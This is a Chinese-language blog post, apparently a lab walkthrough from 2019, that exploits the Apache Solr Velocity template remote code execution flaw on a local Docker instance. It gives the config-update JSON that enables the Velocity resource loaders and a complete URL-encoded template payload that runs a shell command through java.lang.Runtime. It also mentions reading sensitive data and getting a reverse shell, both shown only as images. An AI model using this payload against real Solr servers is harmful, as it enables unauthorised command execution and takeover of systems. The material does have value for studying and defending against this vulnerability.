码迷,mamicode.com
首页 > Web开发 > 详细

Apache Solr Velocity模板远程代码执行

时间:2019-11-04 11:48:52      阅读:111      评论:0      收藏:0      [点我收藏+]

标签:微信公众号   ble   response   节点   startup   端口   puts   cores   character   

更多内容,欢迎关注微信公众号:信Yang安全,期待与您相遇。

这里用的docker环境 很简单的 在这里不再介绍

本地搭建好环境然后访问8983端口 网页如下:

技术图片

 

查下节点名称

技术图片

 

同样名字可以访问http://192.168.35.185:8983/solr/admin/cores获取到名字

技术图片

 

看下config的 红圈的这里两个点必须为true

通过发包来构造出来

{
  "update-queryresponsewriter": {
    "startup": "lazy",
    "name": "velocity",
    "class": "solr.VelocityResponseWriter",
    "template.base.dir": "",
    "solr.resource.loader.enabled": "true",
    "params.resource.loader.enabled": "true"
  }
}

技术图片

 

随后开始命令执行

http://192.168.35.185:8983/solr/test/select?wt=velocity&v.template=custom&v.template.custom=%23set($x=%27%27)+%23set($rt=$x.class.forName(%27java.lang.Runtime%27))+%23set($chr=$x.class.forName(%27java.lang.Character%27))+%23set($str=$x.class.forName(%27java.lang.String%27))+%23set($ex=$rt.getRuntime().exec(%27ls%27))+$ex.waitFor()+%23set($out=$ex.getInputStream())+%23foreach($i+in+[1..$out.available()])$str.valueOf($chr.toChars($out.read()))%23end

技术图片

 

 读取敏感信息

技术图片

反弹shell拿管控权限

 技术图片

 

 更多内容,欢迎关注微信公众号:信Yang安全,期待与您相遇。

Apache Solr Velocity模板远程代码执行

标签:微信公众号   ble   response   节点   startup   端口   puts   cores   character   

原文地址:https://www.cnblogs.com/Yang34/p/11790967.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!